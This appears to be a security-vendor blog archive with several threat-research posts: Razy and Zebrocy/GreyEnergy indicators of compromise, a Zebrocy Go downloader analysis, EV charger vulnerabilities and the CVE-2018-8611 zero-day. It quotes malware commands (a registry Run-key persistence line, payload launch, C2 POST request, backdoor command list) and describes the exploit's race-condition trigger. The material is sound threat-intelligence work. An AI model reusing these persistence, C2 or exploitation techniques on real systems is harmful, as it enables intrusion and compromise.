Kaspersky Lab’s products detect scripts associated with Razy as HEUR:Trojan.Script.Generic.

Below are all the wallet addresses detected in the analyzed scripts:

  • Bitcoin: ‘1BcJZis6Hu2a7mkcrKxRYxXmz6fMpsAN3L’, ‘1CZVki6tqgu2t4ACk84voVpnGpQZMAVzWq’, ‘3KgyGrCiMRpXTihZWY1yZiXnL46KUBzMEY’, ‘1DgjRqs9SwhyuKe8KSMkE1Jjrs59VZhNyj’, ’35muZpFLAQcxjDFDsMrSVPc8WbTxw3TTMC’, ’34pzTteax2EGvrjw3wNMxaPi6misyaWLeJ’.
  • Ethereum: ’33a7305aE6B77f3810364e89821E9B22e6a22d43′, ‘2571B96E2d75b7EC617Fdd83b9e85370E833b3b1′, ’78f7cb5D4750557656f5220A86Bc4FD2C85Ed9a3’.

At the time of writing, total incoming transactions on all these wallets amounted to approximately 0.14 BTC plus 25 ETH.

MD5

Trojan.Win32.Razy.gen
707CA7A72056E397CA9627948125567A
2C274560900BA355EE9B5D35ABC30EF6
BAC320AC63BD289D601441792108A90C
90A83F3B63007D664E6231AA3BC6BD72
66DA07F84661FCB5E659E746B2D7FCCD
Main.js
2C95C42C455C3F6F3BD4DC0853D4CC00
2C22FED85DDA6907EE8A39DD12A230CF
i.js
387CADA4171E705674B9D9B5BF0A859C
67D6CB79955488B709D277DD0B76E6D3
Extab.js
60CB973675C57BDD6B5C5D46EF372475
Bgs.js
F9EF0D18B04DC9E2F9BA07495AE1189C

Malicious domains

gigafilesnote[.]com
apiscr[.]com,
happybizpromo[.]com,
archivepoisk-zone[.]info,
archivepoisk[.]info,
nolkbacteria[.]info,
2searea0[.]info,
touristsila1[.]info,
touristsworl[.]xyz,
solkoptions[.]host.
solkoptions[.]site
mirnorea11[.]xyz,
miroreal[.]xyz,
anhubnew[.]info,
kidpassave[.]xyz

Phishing domains

ton-ico[.]network,
ooo-ooo[.]info.

2019. január 24.

GreyEnergy’s overlap with Zebrocy

In October 2018, ESET published a report describing a set of activity they called GreyEnergy, which is believed to be a successor to BlackEnergy group. BlackEnergy (a.k.a. Sandworm) is best known, among other things, for having been involved in attacks against Ukrainian energy facilities in 2015, which led to power outages. Like its predecessor, GreyEnergy malware has been detected attacking industrial and ICS targets, mainly in Ukraine.

Kaspersky Lab ICS CERT has identified an overlap between GreyEnergy and a Sofacy subset called “Zebrocy”. The Zebrocy activity was named after malware that Sofacy group began to use since mid-November 2015 for the post-exploitation stage of attacks on its victims. Zebrocy’s targets are widely spread across the Middle East, Europe and Asia and the targets’ profiles are mostly government-related.

Both sets of activity used the same servers at the same time and targeted the same organization.

Details Servers

In our private APT Intel report from July 2018 “Zebrocy implements new VBA anti-sandboxing tricks”, details were provided about different Zebrocy C2 servers, including 193.23.181[.]151.

In the course of our research, the following Zebrocy samples were found to use the same server to download additional components (MD5):

7f20f7fbce9deee893dbce1a1b62827d
170d2721b91482e5cabf3d2fec091151
eae0b8997c82ebd93e999d4ce14dedf5
a5cbf5a131e84cd2c0a11fca5ddaa50a
c9e1b0628ac62e5cb01bf1fa30ac8317

The URL used to download additional data looks as follows:

hxxp://193.23.181[.]151/help-desk/remote-assistant-service/PostId.php?q={hex}

This same C2 server was also used in a spearphishing email attachment sent by GreyEnergy (aka FELIXROOT), as mentioned in a FireEye report. Details on this attachment are as follows:

  • The file (11227eca89cc053fb189fac3ebf27497) with the name “Seminar.rtf” exploited CVE-2017-0199
  • “Seminar.rtf” downloaded a second stage document from: hxxp://193.23.181[.]151/Seminar.rtf (4de5adb865b5198b4f2593ad436fceff, exploiting CVE-2017-11882)
  • The original document (Seminar.rtf) was hosted on the same server and downloaded by victims from: hxxp://193.23.181[.]151/ministerstvo-energetiki/seminars/2019/06/Seminar.rtf

Another server we detected that was used both by Zebrocy and by GreyEnergy is 185.217.0[.]124. Similarly, we detected a spearphishing GreyEnergy document (a541295eca38eaa4fde122468d633083, exploiting CVE-2017-11882), also named “Seminar.rtf”.

“Seminar.rtf”, a GreyEnergy decoy document

This document downloads a GreyEnergy sample (78734cd268e5c9ab4184e1bbe21a6eb9) from the following SMB link:

\\185.217.0[.]124\Doc\Seminar\Seminar_2018_1.AO-A

The following Zebrocy samples use this server as C2:

7f20f7fbce9deee893dbce1a1b62827d
170d2721b91482e5cabf3d2fec091151
3803af6700ff4f712cd698cee262d4ac
e3100228f90692a19f88d9acb620960d

They retrieve additional data from the following URL:

hxxp://185.217.0[.]124/help-desk/remote-assistant-service/PostId.php?q={hex}

It is worth noting that at least two samples from the above list use both 193.23.181[.]151 and 185.217.0[.]124 as C2s.

Hosts associated with GreyEnergy and Zebrocy

Attacked company

Additionally, both GreyEnergy and Zebrocy spearphishing documents targeted a number of industrial companies in Kazakhstan. One of them was attacked in June 2018.

GreyEnergy and Zebrocy overlap

Attack timeframe

A spearphishing document entitled ‘Seminar.rtf’, which retrieved a GreyEnergy sample, was sent to the company approximately on June 21, 2018, followed by a Zebrocy spearphishing document sent approximately on June 28:

‘(28.06.18) Izmeneniya v prikaz PK.doc’ Zebrocy decoy document translation:
‘Changes to order, Republic of Kazakhstan’

The two C2 servers discussed above were actively used by Zebrocy and GreyEnergy almost at the same time:

  • 193.23.181[.]151 was used by GreyEnergy and Zebrocy in June 2018
  • 185.217.0[.]124 was used by GreyEnergy between May and June 2018 and by Zebrocy in June 2018
Conclusions

The GreyEnergy/BlackEnergy actor is an advanced group that possesses extensive knowledge on penetrating into their victim´s networks and exploiting any vulnerabilities it finds. This actor has demonstrated its ability to update its tools and infrastructure in order to avoid detection, tracking, and attribution.

Though no direct evidence exists on the origins of GreyEnergy, the links between a Sofacy subset known as Zebrocy and GreyEnergy suggest that these groups are related, as has been suggested before by some public analysis. In this paper, we detailed how both groups shared the same C2 server infrastructure during a certain period of time and how they both targeted the same organization almost at the same time, which seems to confirm the relationship’s existence.

For more information about APT reports please contact: intelreports@kaspersky.com

For more information about ICS threats please contact: ics-cert@kaspersky.com

2019. január 11.

A Zebrocy Go Downloader

Last year at SAS2018 in Cancun, Mexico, “Masha and these Bears” included discussion of a subset of Sofacy activity and malware that we call “Zebrocy”, and predictions for the decline of SPLM/XAgent Sofacy activity coinciding with the acceleration of Zebrocy activity and innovation. Zebrocy was initially introduced as a Sofacy backdoor package in 2015, but the Zebrocy cluster has carved a new approach to malware development and delivery to the world of Sofacy. In line with this approach, we will present more on this Zebrocy innovation and activity playing out at SAS 2019 in Singapore.

Our colleagues at Palo Alto recently posted an analysis of Zebrocy malware. The analysis is good and marked their first detection of a Zebrocy Go variant as October 11, 2018. Because there is much to this cluster, clarifying and adding to the discussion is always productive.

Our original “Zebrocy Innovates – Layered Spearphishing Attachments and Go Downloaders” June 2018 writeup documents the very same downloader, putting the initial deployment of Zebrocy Go downloader activity at May 10, 2018. And while the targeting in the May event was most likely different from the October event, we documented this same Go downloader and same C2 was used to target a Kyrgyzstan organization. Also interesting is that the exact same system was a previous Zebrocy target earlier in 2018. So, knowing that this same activity is being reported on as “new” six months later tells us a bit about the willingness of this group to re-use rare components and infrastructure across different targets.

While they are innovating with additional languages, as we predicted in early 2018, their infrastructure and individual components may have more longevity than predicted. Additionally, at the beginning of 2018, we predicted the volume of Zebrocy activity and innovation will continue to increase, while the more traditional SPLM/XAgent activity will continue to decline. Reporting on SPLM/XAgent certainly has followed this course in 2018 as SPLM/XAgent detections wind down globally, as has Sofacy’s use of this malware from our perspective.

Much of the content below is reprinted from our June document.

The Sofacy subset we identify as “Zebrocy” continues to target Central Asian government related organizations, both in-country and remote locations, along with a new middle eastern diplomatic target. And, as predicted, they continue to build out their malware set with a variety of scripts and managed code. In this case, we see new spearphishing components – an LNK file maintaining powershell scripts and a Go-implemented system information collector/downloader. This is the first time we have observed a well-known APT deploy malware with this compiled, open source language “Go”. There is much continued recent Zebrocy activity using their previously known malware set as well.

Starting in May 2018, Zebrocy spearphished Central Asian government related targets directly with this new Go downloader. For example, the attachment name included one “30-144.arj” compressed archive, an older archiver type handled by 7zip, Rar/WinRAR, and others. Users found “30-144.exe” inside the archive with an altered file icon made to look like the file was a Word document (regardless of the .exe file extension). And in a similar fashion in early June, Zebrocy spearphished over a half-dozen accounts targeting several Central Asian countries’ diplomatic organizations with a similar scheme “2018-05-Invitation-Letter(1).rar//2018-05-Invitation-Letter(pril).docx”, sending out a more common Zebrocy Delphi downloader.

In other cases, delivery of the new Go downloader was not straightforward. The new Go downloader also was delivered with a new spearphishing object that rolls up multiple layers of LNK file, powershell scripts, base64 encoded content, .docx files and the Go downloader files. The downloader is an unusually large executable at over 1.5mb, written to disk and launched by a powershell script. So the attachment that arrived over email was large.
The powershell script reads the file’s contents from a very large LNK file that was included as an email attachment, and then writes it to disk along with a Word document of the same name. So, launching the downloader is followed with the opening of an identically named decoy word document with “WINWORD.EXE” /n “***\30-276(pril).docx” /o”. The downloader collects a large amount of system information and POSTs it to a known Zebrocy C2, then pulls down known Zebrocy Delphi payload code, launches it, and deletes itself.

We observed previous, somewhat similar spearphishing scenarios with an archive containing .LNK, .docx, and base64 encoded executable code, delivering offensive Finfisher objects in separate intrusion activity clusters. This activity was not Sofacy, but the spearphishing techniques were somewhat similar – the layered powershell script attachment technique is not the same, but not altogether new.

And, it is important to reiterate that these Central Asian government and diplomatic targets are often geolocated remotely. In the list of target geolocations, notice countries like South Korea, the Netherlands, etc. In addition to Zebrocy Go downloader data, this report provides data on various other observed Zebrocy malware and targets over the past three months.

Spreading

Mostly all observed Zebrocy activity involves spearphishing. Spearphish attachments arrive with .rar or .arj extensions. Filename themes include official government correspondence invitations, embassy notes, and other relevant items of interest to diplomatic and government staff. Enclosed objects may be LNK, docx, or exe files.

A decoy PDF that directly targeted a Central Asian nation is included in one of the .arj attachments alongside the Go downloader. The content is titled “Possible joint projects in cooperation with the International Academy of Sciences” and lists multiple potential projects requiring international cooperation with Tajikistan and other countries. This document appears to be a legitimate one that was stolen, created mid-May 2018. While we cannot reprint potentially leaked information publicly, clearly, the document was intended for a Russian-language reader.

Powershell launcher from within LNK

The LNK containing two layers of powershell script and base64 encoded content is an unusual implementation – contents from a couple are listed at the technical appendix. When opened, the script opens the shortcut file it is delivered within (“30-276(pril).docx.lnk”), pulls out the base64 encoded contents (in one case, from byte 3507 to byte 6708744), base64 decodes the content and another layer of the same powershell decoding. This script writes two files to disk as “30-276(pril).exe” and “30-276(pril).docx” and opens both files, leading to the launch of the Go language system information collector/downloader and a decoy Word document.

Go System Information Collector/Downloader

Md5              333d2b9e99b36fb42f9e79a2833fad9c
Sha256         fcf03bf5ef4babce577dd13483391344e957fd2c855624c9f0573880b8cba62e
Size              1.79mb (upx packed – 3.5mb upx unpacked)
CompiledOn Stomped (Wed Dec 31 17:00:00 1969)
Type             PE 32-bit Go executable
Name           30-276(pril).exe

This new Go component not only downloads and executes another Zebrocy component, but it enumerates and collects a fair amount of system data for upload to its C2, prior to downloading and executing any further modules. It simply collects data using the systeminfo utility, and in turn makes a variety of WMI calls.

After collecting system information, the backdoor calls out to POST to its hardcoded C2, in this case a hardcoded IP/Url. Note that the backdoor simply uses the default Go user-agent:
“POST /technet-support/library/online-service-description.php?id_name=345XXXD5
HTTP/1.1
Host: 89.37.226.148
User-Agent: Go-http-client/1.1”

With this POST, the module uploads all of the system information it just gathered with the exhaustive systeminfo utility over http: hostname, date/time, all hardware, hotfix, service and software information.

The module then retrieves the gzip’d, better known Zebrocy dropper over port 80 as part of an encoded jpg file, writes it to disk, and executes from a command line:
“cmd /C c:\users\XXX\appdata\local\Identities\{83AXXXXX-986F-1673-091A-02XXXXXXXXXX}\w32srv.exe”
and adds a run key persistence entry with the system utility reg.exe:
cmd /C “reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Driveupd /d
c:\users\XXX\appdata\local\Identities\{83AXXXXX-986F-1673-091A-02XXXXXXXXXX}\w32srv.exe /f”

Zebrocy AutoIT Dropper

Md5              3c58ed6913593671666283cb7315dec3
Sha256         96c3700ad639faa85982047e05fbd71c3dfd502b09f9860685498124e7dbaa46
Size              478.5kb (upx-packed)
Compiled     Fri Apr 27 06:40:32 2018
Type             PE32 AutoIT executable
Path, Name  appdata\Identities\{83AF1378-986F-1673-091A-02681FA62C3B}\w32srv.exe

This AutoIT dropper writes out a Delphi payload, consistent with previous behavior going back to November 2015, initially described in our January 2016 report “Zebrocy – Sofacy APT Deploys New Delphi Payload”.

Zebrocy Delphi Payload

Md5               2f83acae57f040ac486eca5890649381
Sha256          f9e96b2a453ff8922b1e858ca2d74156cb7ba5e04b3e936b77254619e6afa4e8
Size               786kb
Compiled       Fri Jun 19 16:22:17 1992 (stomped/altered)
Type              PE32 exe [v4.7.7] Path, Name   c:\ProgramData\Protection\Active\armpro.exe

Interestingly the final payload reverts back to an earlier version [v4.7.7]. A “TURBO” command is missing from this Zebrocy Delphi backdoor command list .
SYS_INFO
SCAN_ALL
SCAN_LIST
DOWNLOAD_DAY
DOWNLOAD_LIST
CREATE_FOLDER
UPLOAD_FILE
FILE_EXECUTE
DELETE_FILES
REG_WRITE_VALUE
REG_READ_VALUE
REG_DELETE_VALUE
REG_GET_KEYS_VALUES
REG_DELETE_KEY
KILL_PROCESS
CONFIG
GET_NETWORK
CMD_EXECUTE
DOWNLOAD_DATE
DELETE_FOLDER
UPLOAD_AND_EXECUTE_FILE
SCREENSHOTS
FILE_EXECUTE
SET_HIDDEN_ATTR
START
STOP
KILL_MYSELF

Infrastructure

Zebrocy backdoors are configured to directly communicate with IP assigned web server hosts over port 80, and apparently the group favors Debian Linux for this part of infrastructure: Apache 2.4.10 running on Debian Linux. A somewhat sloppy approach continues, and the group set up and configured one of the sites with digital certificates using a typical Sofacy-sounding domain that they have not yet registered: “weekpost.org”. Digital certificate details are provided in the appendix.

These “fast setup” VPS servers run in “qhoster[.]com” can be paid for with Webmoney, Bitcoin, Litecoin, Dash, Alfa Click, Qiwi, transfers from Sberbank Rossii, Svyaznoy, Promsvyazbank, and more. Although, it appears that Bitcoin and Dash may be of the most interest to help ensure anonymous transactions. Dataclub provides similar payment methods:

One of the VPS IP addresses (80.255.12[.]252) is hosted in the “afterburst[.]com”/Oxygem range. This service is the odd one out and is unusual because it only supports VISA/major credit cards and Paypal at checkout. If other payment options are provided, they are not a part of the public interface.

Victims and Targeting

Zebrocy Go downloader 2018 targets continue to be Central Asian government foreign policy and administrative related. Some of these organizations are geolocated in-country, or locally, and some are located remotely. In several cases, these same systems have seen multiple artefacts from Zebrocy over the course of 2017 and early 2018:
• Kazakhstan
• Kyrgyzstan
• Azerbaijan
• Tajikistan

Additional recent Zebrocy target geo-locations (targeting various Central Asian/ex-USSR local and remote government locations):
• Qatar
• Ukraine
• Czech Republic
• Mongolia
• Jordan
• Germany
• Belgium
• Iran
• Turkey
• Armenia
• Afghanistan
• South Korea
• Turkmenistan
• Kazakhstan
• Netherlands
• Kuwait
• United Arab Emirates
• Spain
• Poland
• Qatar
• Oman
• Switzerland
• Mongolia
• Kyrgyzstan
• United Kingdom

Attribution

Zebrocy activity is a known subset of Sofacy activity. We predicted that they would continue to innovate within their malware development after observing past behavior, developing with Delphi, AutoIT, .Net C#, Powershell, and now “Go” languages. Their continued targeting, phishing techniques, infrastructure setup, technique and malware innovation, and previously known backdoors help provide strong confidence that this activity continues to be Zebrocy.

Conclusions

Zebrocy continues to maintain a higher level of volume attacking local and remote ex-USSR republic Central Asian targets than other clusters of targeted Sofacy activity. Also interesting with this Sofacy sub-group is the innovation that we continue to see within their malware development. Much of the spearphishing remains thematically the same, but the remote locations of these Central Asian targets are becoming more spread out – South Korea, Netherlands, etc. While their focus has been on Windows users, it seems that we can expect the group to continue making more innovations within their malware set. Perhaps all their components will soon support all OS platforms that their targets may be using, including Linux and MacOS. Zebrocy spearphishing continues to be characteristically higher volume for a targeted attacker, and most likely that trend will continue.
And, as their spearphishing techniques progress to rival Finfisher techniques without requiring zero-day exploitation, perhaps Zebrocy will expand their duplication of more sources of open source spearphishing techniques.

IoC

Go downloader
333d2b9e99b36fb42f9e79a2833fad9c

IPs
80.255.12.252
89.37.226.148
46.183.218.34
185.77.131.110
92.114.92.128

URLs
/technet-support/library/online-service-description.php?id_name=XXXXX
/software-apptication/help-support-apl/getidpolapl.php

File – paths and names
30-276(pril).exe
30-144-(copy).exe
Embassy Note No.259.docx.lnk
2018-05-Invitation-Letter(1).rar//2018-05-Invitation-Letter(pril).docx

2019. január 10.

The world’s southernmost security conference

When asked about his best race, Ayrton Senna replied that it was when he raced karting cars. For him it was the best because it was only for the sake of sports and free from commercial sponsoring and commercial interests. I have this same feeling about computer security conferences, because they attract people who really seek knowledge, both to receive and to share it.

In November I had the privilege of participating in a conference that can rightfully be labelled the world’s southernmost. It is called “Patagonia Hacking” and it is organized in the Chilean city of Punta Arenas: https://www.patagoniasec.cl

This event develops in two days – the first is dedicated to workshops, and the second is for presentations to the attendants. On my part, I had the opportunity to present two topics, one each day. On the day dedicated to conferences, my topic was the “Black Box” attacks against financial institutions in Latin America – a phenomenon that has become a fearful reality for the banks in the region.

Although the event took place in a remote city, attendants included enthusiasts from all over the world. There also were some Latin American speakers.

Despite the low temperatures and strong winds, the event’s welcome was very warm. It was very pleasant meeting the region’s new experts and sharing with them during those busy days.

The third edition of the event took place this year. If you plan to participate next year, apart from the conference, you should try the traditional lamb meat, Calafate beer and Calafate’s pisco sour, as well as making time to visit the Strait of Magellan Park which includes Fort Bulnes.

P.S. A curious fact – it seems that the southernmost city with Uber also happens to be Punta Arenas.

2018. december 13.

Remotely controlled EV home chargers – the threats and vulnerabilities

We are now seeing signs of a possible shift in the field of personal transport. Recent events such as the ‘dieselgate’ scandal undermine customer and government confidence in combustion engines and their environmental safety. At the same time there has been a big step forward in the development of electric vehicles. In addition to favorable media coverage, modern EVs have evolved a lot in terms of battery endurance, driving speeds and interior and exterior design.

To stimulate growth in the personal EV segment some countries even have special tax relief programs for EV owners. But there is still a major problem – the lack of charging infrastructure. This may not be as relevant in big cities, but in other places car owners mostly rely on their own home EV chargers, a relatively new class of device that has attracted our attention.

There are lots of home charger vendors. Some of them, such as ABB or GE, are well-known brands, but some smaller companies have to add ‘bells and whistles’ to their products to attract customers. One of the most obvious and popular options in this respect is remote control of the charging process. But from our point of view this sort of improvement can make chargers an easy target for a variety of attacks. To prove it we decided to take one of them, ChargePoint Home made by ChargePoint, Inc., and conduct some in-depth security research.

ChargePoint Home supports both Wi-Fi and Bluetooth wireless technologies. The end user can remotely control the charging process with a mobile application available for both iOS and Android platforms. All that’s needed is to register a new account in the application, connect a smartphone to the device via Bluetooth, set the parameters of a Wi-Fi network for an internet connection, and finish the registration process by sending the created user ID and the smartphone’s GPS coordinates to the backend from the device.

In a registered state, the device establishes a connection to the remote backend server, which is used to transfer the user’s commands from the application. The application thereby makes it possible to remotely change the maximum consumable current and to start and stop the charging process.

To explore the registration data flows in more detail, we used a rooted smartphone with the hcidump application installed. With this application, we were able to make a dump of the whole registration process, which can later be viewed in Wireshark.

The Bluetooth interface is only used during the registration phase and disabled afterwards. But we found another, rather unusual wireless communication channel that is implemented by means of photodiode on the device side and photoflash on the smartphone side. It seems to have just one purpose: by playing a special blinking pattern on the flash, the application can trigger the factory reset process after the device’s next reboot. During the reboot, Wi-Fi settings and registered user information will be wiped.

In addition, we found a web server with enabled CGI on the device. All web server communications are protected by the SSL protocol with the same scheme as the control server, so the web server inherits the described certificate security issue. We discovered a series of vulnerabilities in CGI binaries that can be used by an intruder to gain control of the device. Two of them were found in the binary used to upload files in different folders to the device depending on the query string parameters. Other vulnerabilities (stack buffer overflow) were found in the binary used to send different commands to the charger in the vendor-specific format (included in a POST message body). We also found the same stack buffer overflow vulnerabilities in the other binary used for downloading different system logs from the device. All this presents attackers with an opportunity to control the charging process by connecting to the target’s Wi-Fi network.

Vulnerabilities in the Bluetooth stack were also found, but they are all minor due to the limited use of Bluetooth during regular device operation.

We can see two major capabilities an intruder can gain from a successful attack. They will be able to:

  • Adjust the maximum current that can be consumed during charging. As a result, an attacker can temporarily disable parts of the user’s home electrical system or even cause physical damage – for example, if the device is not connected properly, a fire could start due to wires overheating.
  • Stop a car’s charging process at any time, for example, restricting an EV owner’s ability to drive where they need to, and even cause financial losses.

We sent all our findings to ChargePoint, Inc. The vulnerabilities we discovered have already been patched, but the question remains as to whether there is any reason to implement wireless interfaces when there is no real need for them. The benefits they bring are often outweighed by the security risks they add.

Download “ChargePoint Home security research” (English, PDF)

2018. december 12.

Zero-day in Windows Kernel Transaction Manager (CVE-2018-8611)

Executive summary

In October 2018, our AEP (Automatic Exploit Prevention) systems detected an attempt to exploit a vulnerability in the Microsoft Windows operating system. Further analysis led us to uncover a zero-day vulnerability in ntoskrnl.exe. We reported it to Microsoft on October 29, 2018. The company confirmed the vulnerability and assigned it CVE-2018-8611. Microsoft just released a patch, part of its December update, crediting Kaspersky Lab researchers Boris Larin (Oct0xor) and Igor Soumenkov (2igosha) with the discovery.

This is the third consecutive exploited Local Privilege Escalation vulnerability in Windows we discovered this autumn using our technologies. Unlike the previously reported vulnerabilities in win32k.sys (CVE-2018-8589 and CVE-2018-8453), CVE-2018-8611 is an especially dangerous threat – a vulnerability in the Kernel Transaction Manager driver. It can also be used to escape the sandbox in modern web browsers, including Chrome and Edge, since syscall filtering mitigations do not apply to ntoskrnl.exe system calls.

Just like with CVE-2018-8589, we believe this exploit is used by several threat actors including, but possibly not limited to, FruityArmor and SandCat. While FruityArmor is known to have used zero-days before, SandCat is a new APT we discovered only recently. In addition to this zero-day and CHAINSHOT, SandCat also uses the FinFisher / FinSpy framework.

Kaspersky Lab products detected this exploit proactively through the following technologies:

  1. Behavioral detection engine and Automatic Exploit Prevention for endpoint products
  2. Advanced Sandboxing and Anti Malware engine for Kaspersky Anti Targeted Attack Platform (KATA)

Kaspersky Lab verdicts for the artifacts used in this and related attacks are:

  • HEUR:Exploit.Win32.Generic
  • HEUR:Trojan.Win32.Generic
  • PDM:Exploit.Win32.Generic
Brief details – CVE-2018-8611 vulnerability

CVE-2018-8611 is a race condition that is present in the Kernel Transaction Manager due to improper processing of transacted file operations in kernel mode.

This vulnerability successfully bypasses modern process mitigation policies, such as Win32k System call Filtering that is used, among others, in the Microsoft Edge Sandbox and the Win32k Lockdown Policy employed in the Google Chrome Sandbox. Combined with a compromised renderer process, for example, this vulnerability can lead to a full Remote Command Execution exploit chain in the latest state-of-the-art web-browsers.

We have found multiple builds of exploit for this vulnerability. The latest build includes changes to reflect the latest versions of the Windows OS.

A check for the latest build at the time of discovery: Windows 10 Redstone 4 Build 17133

Similarly to CHAINSHOT, this exploit heavily relies on the use of C++ exception handling mechanisms with custom error codes.

To abuse this vulnerability exploit first creates a named pipe and opens it for read and write. Then it creates a pair of new transaction manager objects, resource manager objects, transaction objects and creates a big number of enlistment objects for what we will call “Transaction #2”. Enlistment is a special object that is used for association between a transaction and a resource manager. When the transaction state changes associated resource manager is notified by the KTM. After that it creates one more enlistment object only now it does so for “Transaction #1” and commits all the changes made during this transaction.
After all the initial preparations have been made exploit proceeds to the second part of vulnerability trigger. It creates multiple threads and binds them to a single CPU core. One of created threads calls NtQueryInformationResourceManager in a loop, while second thread tries to execute NtRecoverResourceManager once. But the vulnerability itself is triggered in the third thread. This thread uses a trick of execution NtQueryInformationThread to obtain information on the latest executed syscall for the second thread. Successful execution of NtRecoverResourceManager will mean that race condition has occurred and further execution of WriteFile on previously created named pipe will lead to memory corruption.


Proof of concept: execution of WriteFile with buffer set to 0x41

As always, we provided Microsoft with a proof of concept for this vulnerability, along with source code. And it was later shared through Microsoft Active Protections Program (MAPP).

More information about SandCat, FruityArmor and CVE-2018-8611 is available to customers of Kaspersky Intelligence Reports. Contact: intelreports@kaspersky.com